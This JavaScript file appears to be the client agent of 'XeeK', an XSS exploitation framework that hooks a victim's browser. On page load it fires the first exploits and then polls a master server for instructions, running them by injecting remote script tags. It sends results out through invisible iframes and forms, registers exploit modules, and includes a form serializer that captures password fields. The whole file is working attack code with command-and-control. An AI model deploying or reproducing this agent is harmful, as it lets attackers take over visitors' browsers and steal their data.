
/**
 * @brief Main constructor
 * @param master_server_url XeeK server URL
 * @param fetch_interval Interval for fetching instructions, in seconds
 */
function _XeekAgent(master_server_url, fetch_interval_secs) {

  //Set parameters
  this.master_server_url = master_server_url;
  this.fetch_interval_usecs = fetch_interval_secs * 1000;
  
  /**
   * @brief Call the run method when the page is completely loaded
   */
  this.startWhenReady = function () {
    var t = this;
    this.Helpers.addEvent(window, 'load', function() {t.run()});
  }

  /**
   * @brief Call the fetchInstr method every X seconds
   */
  this.run = function () {
    var t = this;
    Xeek_first_exploits();
    this.fetch_interval_timer = setInterval(function() {t.fetchInstr()}, this.fetch_interval_usecs); 
  }

  /**
   * @brief Fetch one instruction and execute it
   */
  this.fetchInstr = function() {
    this.RPC.get("InstructionFetchRPC");
  }
  
  
  /**
   * @brief Save result
   * @param data Data to be sent
   */
  this.saveResult = function(token, data) {
    this.RPC.post("ResultSaveRPC", data, token);
  }


  /**
   * RPC namespace 
   */
  this.RPC = {

    /**
     * Call a RPC service using GET
     * @param service RPC service
     * @param params RPC parameters
     */
    get: function(service, params, token){
      params_service = "rpc="+service+"&"+XEEK_SESSID_COOKIE;
      if(token){
        params_service += "&token="+token;
      }
      if(params) {
        params_service += "&" + params
      }
      XeekAgent.Ajax.XDom.get(XeekAgent.master_server_url, params_service);
    },


    /**
     * Call a RPC service using POST
     * @param service RPC service
     * @param params RPC parameters
     */
    post: function(service, params, token){
      url = XeekAgent.master_server_url + "?rpc="+service+"&"+XEEK_SESSID_COOKIE+"&token="+token;
      XeekAgent.Ajax.XDom.post(url, params);
    }
  };
  
  
  /**
   * Ajax namespace
   */
  this.Ajax = {
  
    /**
     * Regular Ajax requests
     */
    Classic: {
    
    
      //Get XHR object
      getTransport: function() {
        var returnValue;
        var funcs = [ function() {return new XMLHttpRequest()},
                      function() {return new ActiveXObject('Msxml2.XMLHTTP.6.0')}, 
                      function() {return new ActiveXObject('Msxml2.XMLHTTP.3.0')}, 
                      function() {return new ActiveXObject('Msxml2.XMLHTTP')},
                      function() {return new ActiveXObject('Microsoft.XMLHTTP')},
                    ];
              
        for (var i = 0, length = funcs.length; i < length; i++) {
          var lambda = funcs[i];
          try {
            returnValue = lambda();
            break;
          } catch (e) { }
        }
        return returnValue;
      },
      
      
      //Perform a request
      //The callback must take a error parameter, automatically set to true if there is a cross-domain error
      request: function (transport, method, page, params, callback) {
      
        //Detect cross-domain requests
        var url_location = XeekAgent.Helpers.Url.parse(page);
        var current_location = document.location;
        if(  (url_location.host != "" && url_location.host != current_location.host)
          || (url_location.protocol != "" && url_location.protocol != current_location.protocol.replace(':','') )
          || (url_location.port != "" && url_location.port != current_location.port)) {
          
          //Call the callback with the error parameter set to true
          callback.call(transport, true);
          
        } else {
      
          //If this is a legitimate request, start it !
          if(method.toLowerCase() == 'get'){
            params = null;
          }
          try {
            transport.open(method, page, true);
            transport.onreadystatechange = this.dispatchHandler(transport, callback);
            if(params) {
              transport.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
              transport.setRequestHeader("Content-length", params.length);
              transport.setRequestHeader("Connection", "close");
            }
            transport.send(params);
          } catch(e) { //Handle other errors
            callback.call(transport, true);
          }
        }
      },
      
      //Handler called on state change
      dispatchHandler: function(transport, callback) {
        t = transport;
        return function() {
          if(t.readyState == 4){
            //Handle cross-domain errors for Firefox and Chrome
            callback.call(t, false); //Call the callback, with this = transport object
          }
        }
      },
      
      //Perform a GET request
      get: function (page, POSTparams, callback) {
        var transport = this.getTransport();
        this.request(transport, 'GET', page, POSTparams, callback);
      },
      
      //Perform a POST request
      post: function (page, POSTparams, callback) {
        var transport = this.getTransport();
        this.request(transport, 'POST', page, POSTparams, callback);
      }
    
    },
    
    /**
     * Ajax Cross-domain requests
     */
    XDom: {
    
      /**
       * Ajax cross domain GET request
       * @param page
       * @param params
       */
      get: function (page, params) {

        //Clean the DOM
        if(document.getElementById('xeek_ajax_xdom_get')){
          e = document.getElementById('xeek_ajax_xdom_get');
          e.parentNode.removeChild(e);
        }

        //Create the new tag
        var script = document.createElement('script');
        
        if(params) {
          script.src = page + "?" + params + "&";
        } else {
          script.src = page + "?";
        }
        
        //Prevent IE6 from caching the request
        script.src += "anticache="+(new Date().getTime());
        
        script.id = 'xeek_ajax_xdom_get';
        script.type = 'text/javascript';

        document.body.appendChild(script);
      },
      
      
      /**
       * Ajax cross domain POST request
       * @param page
       * @param params
       */
      post: function (page, params) {
      
        //Clean the DOM
        if(document.getElementById('xeek_ajax_xdom_post_iframe')){
          e = document.getElementById('xeek_ajax_xdom_post_iframe');
          e.parentNode.removeChild(e);
        }
        if(document.getElementById('xeek_ajax_xdom_post_form')){
          e = document.getElementById('xeek_ajax_xdom_post_form');
          e.parentNode.removeChild(e);
        }
      
        //Create an invisible iframe and append it to the body
        var iframe;
        try {
          //IE does not support setting the name of the iframe after creation, so here is the hack
          //Cf http://terminalapp.net/submitting-a-form-with-target-set-to-a-script-generated-iframe-on-ie/
          iframe = document.createElement('<iframe name="xeek_ajax_xdom_post_iframe">');
        } catch (ex) {
          //For all other browsers
          iframe = document.createElement('iframe');
          iframe.name = "xeek_ajax_xdom_post_iframe";
        }
        XeekAgent.Helpers.makeInvisible(iframe);
        
        
        iframe.id = "xeek_ajax_xdom_post_iframe";
        document.body.appendChild(iframe);
        
        
        //Create an invisible form which target is the iframe
        var form = document.createElement('form');
        XeekAgent.Helpers.makeInvisible(form);
        form.setAttribute("action", page);
        form.setAttribute("method", "post");
        form.id = "xeek_ajax_xdom_post_form";
        form.target = "xeek_ajax_xdom_post_iframe";
        
        //Create fields to receive parameters
        for(param_name in params){
          var input = document.createElement('textarea');
          input.name = param_name;
          input.value = params[param_name];
          form.appendChild(input);
        }

        //Append the form to the body and submit it
        document.body.appendChild(form);
        form.submit();

      }
    
    }
  };

  
  
  /**
   * Helpers namespace
   */
  this.Helpers = {
  
    /**
     * Browser detection
     */
    Browser: (function(){
      var ua = navigator.userAgent;
      var isOpera = Object.prototype.toString.call(window.opera) == '[object Opera]';
      return {
        IE:             !!window.attachEvent && !isOpera,
        Opera:          isOpera,
        WebKit:         ua.indexOf('AppleWebKit/') > -1,
        Gecko:          ua.indexOf('Gecko') > -1 && ua.indexOf('KHTML') === -1,
        MobileSafari:   /Apple.*Mobile.*Safari/.test(ua)
      }
    })(),
    
    
    /**
     * Add an event to a DOM element
     * @param obj DOM object
     * @param type event name ('load', 'unload', etc.)
     * @param fn function to call when the event occurs
     */
    addEvent: function(obj, type, fn){
      if (obj.addEventListener)
        obj.addEventListener(type, fn, false);
      else if (obj.attachEvent){
        obj["e"+type+fn] = fn;
        obj[type+fn] = function() {obj["e"+type+fn]( window.event );}
        obj.attachEvent("on"+type, obj[type+fn]);
      }
    },
  
    /**
     * Hide a DOM element
     * @param elem DOM element to hide
     */
    hide: function(elem) {
      elem.style.visibility = "hidden";
    },
    
    
    /**
     * Make a DOM element completely invisible
     * @param elem DOM element to disappear
     
     */
    makeInvisible: function(elem) {
      XeekAgent.Helpers.hide(elem);
      
      //Change the size of the element so that it's really invisble
      elem.width = 0;
      elem.height = 0;
      elem.marginHeight = 0;
      elem.marginWidth = 0;
    },
    
    /**
     * Make a DOM element visible
     * @param elem DOM element to show
     */
    show: function(elem) {
      elem.style.visibility = "visible";
    },
    
    
    /**
     * URL based helpers
     */
    Url: {
     
      // public method for url encoding
      encode : function (string) {
        return escape(this._utf8_encode(string));
      },
     
      // public method for url decoding
      decode : function (string) {
        return this._utf8_decode(unescape(string));
      },
     
      // private method for UTF-8 encoding
      _utf8_encode : function (string) {
        string = string.replace(/\r\n/g,"\n");
        var utftext = "";
     
        for (var n = 0; n < string.length; n++) {
     
          var c = string.charCodeAt(n);
     
          if (c < 128) {
            utftext += String.fromCharCode(c);
          }
          else if((c > 127) && (c < 2048)) {
            utftext += String.fromCharCode((c >> 6) | 192);
            utftext += String.fromCharCode((c & 63) | 128);
          }
          else {
            utftext += String.fromCharCode((c >> 12) | 224);
            utftext += String.fromCharCode(((c >> 6) & 63) | 128);
            utftext += String.fromCharCode((c & 63) | 128);
          }
     
        }
     
        return utftext;
      },
     
      // private method for UTF-8 decoding
      _utf8_decode : function (utftext) {
        var string = "";
        var i = 0;
        var c = c1 = c2 = 0;
     
        while ( i < utftext.length ) {
     
          c = utftext.charCodeAt(i);
     
          if (c < 128) {
            string += String.fromCharCode(c);
            i++;
          }
          else if((c > 191) && (c < 224)) {
            c2 = utftext.charCodeAt(i+1);
            string += String.fromCharCode(((c & 31) << 6) | (c2 & 63));
            i += 2;
          }
          else {
            c2 = utftext.charCodeAt(i+1);
            c3 = utftext.charCodeAt(i+2);
            string += String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
            i += 3;
          }
     
        }
     
        return string;
      },
     
      // Pase a URL
      // Cf http://blog.stevenlevithan.com/archives/parseuri
      parse : function (str) {
        var	o   = {
            strictMode: false,
            key: ["source","protocol","authority","userInfo","user","password","host","port","relative","path","directory","file","query","anchor"],
            q:   {
              name:   "queryKey",
              parser: /(?:^|&)([^&=]*)=?([^&]*)/g
            },
            parser: {
              strict: /^(?:([^:\/?#]+):)?(?:\/\/((?:(([^:@]*)(?::([^:@]*))?)?@)?([^:\/?#]*)(?::(\d*))?))?((((?:[^?#\/]*\/)*)([^?#]*))(?:\?([^#]*))?(?:#(.*))?)/,
              loose:  /^(?:(?![^:@]+:[^:@\/]*@)([^:\/?#.]+):)?(?:\/\/)?((?:(([^:@]*)(?::([^:@]*))?)?@)?([^:\/?#]*)(?::(\d*))?)(((\/(?:[^?#](?![^?#\/]*\.[^?#\/.]+(?:[?#]|$)))*\/?)?([^?#\/]*))(?:\?([^#]*))?(?:#(.*))?)/
            }
          },
          m   = o.parser[o.strictMode ? "strict" : "loose"].exec(str),
          uri = {},
          i   = 14;

        while (i--) uri[o.key[i]] = m[i] || "";

        uri[o.q.name] = {};
        uri[o.key[12]].replace(o.q.parser, function ($0, $1, $2) {
          if ($1) uri[o.q.name][$1] = $2;
        });

        return uri;
      }


      /*
      parse : function (url) {
        var a =  document.createElement('a');
        a.href = url;
        return {
          source: url,
          protocol: a.protocol,
          host: a.hostname,
          port: a.port,
          query: a.search,
          params: (function(){
            var ret = {},
              seg = a.search.replace(/^\?/,'').split('&'),
              len = seg.length, i = 0, s;
            for (;i<len;i++) {
              if (!seg[i]) { continue; }
              s = seg[i].split('=');
              ret[s[0]] = s[1];
            }
            return ret;
          })(),
          file: (a.pathname.match(/\/([^\/?#]+)$/i) || [,''])[1],
          hash: a.hash.replace('#',''),
          path: a.pathname.replace(/^([^\/])/,'/$1'),
          relative: (a.href.match(/tps?:\/\/[^\/]+(.+)/) || [,''])[1],
          segments: a.pathname.replace(/^\//,'').split('/')
        };
      }*/
    },
  
  
    /**
     * Serializes a form. Based on http://ra-ajax.org/how-to-create-an-ajax-library-part-6-serializing-your-forms
     * @param form form to serialize
     * @return string
     */
    serializeForm: function(form) {

      // Return value
      var retVal = '';

      // Getting ALL elements inside of form element
      var els = form.getElementsByTagName('*');
      
      // Looping through all elements inside of form and checking to see if they're "form elements"
      for(var idx = 0; idx < els.length; idx++) {
        var el = els[idx];

        // According to the HTTP/HTML specs we shouldn't serialize disabled controls
        // Notice also that according to the HTTP/HTML standards we should also serialize the
        // name/value pair meaning that the name attribute are being used as the ID of the control
        // Though for Ra controls the name attribute will have the same value as the ID attribute
        if( !el.disabled && el.name && el.name.length > 0 ) {
          switch(el.tagName.toLowerCase()) {
            case 'input':
              switch( el.type ) {
                // Note we SKIP Buttons and Submits since there are no reasons as to why we 
                // should submit those anyway
                case 'checkbox':
                case 'radio':
                  if( el.checked ) {
                    if( retVal.length > 0 ) {
                      retVal += '&';
                    }
                    retVal += el.name + '=' + encodeURIComponent(el.value);
                  }
                  break;
                case 'hidden':
                case 'password':
                case 'text':
                  if( retVal.length > 0 ) {
                    retVal += '&';
                  }
                  retVal += el.name + '=' + encodeURIComponent(el.value);
                  break;
              }
              break;
            case 'select':
            case 'textarea':
              if( retVal.length > 0 ) {
                retVal += '&';
              }
              retVal += el.name + '=' + encodeURIComponent(el.value);
              break;
          }
        }
      }
      return retVal;
    }
    
    
  };
 
 
  /**
   * Iframe jail
   */
  this.iframe_jail = null;
}

/**
 * Module namespace
 */
_XeekAgent.prototype.Modules = {
  Exploits: {}
};

/**
 * Shortcut for creating an exploit
 */
function CREATE_XEEK_EXPLOIT(id, obj){
  _XeekAgent.prototype.Modules.Exploits[id] = obj;
}

/**
 * Shortcut for accessing an exploit
 */
function XEEK_EXPLOIT(id){
  return _XeekAgent.prototype.Modules.Exploits[id];
}

/**
 * Main
 */
var XeekAgent;

if(!XeekAgent) {
  XeekAgent = new _XeekAgent(XEEK_RPC_URL, XEEK_FETCH_INTERVAL_SECS);
  XeekAgent.startWhenReady();
}
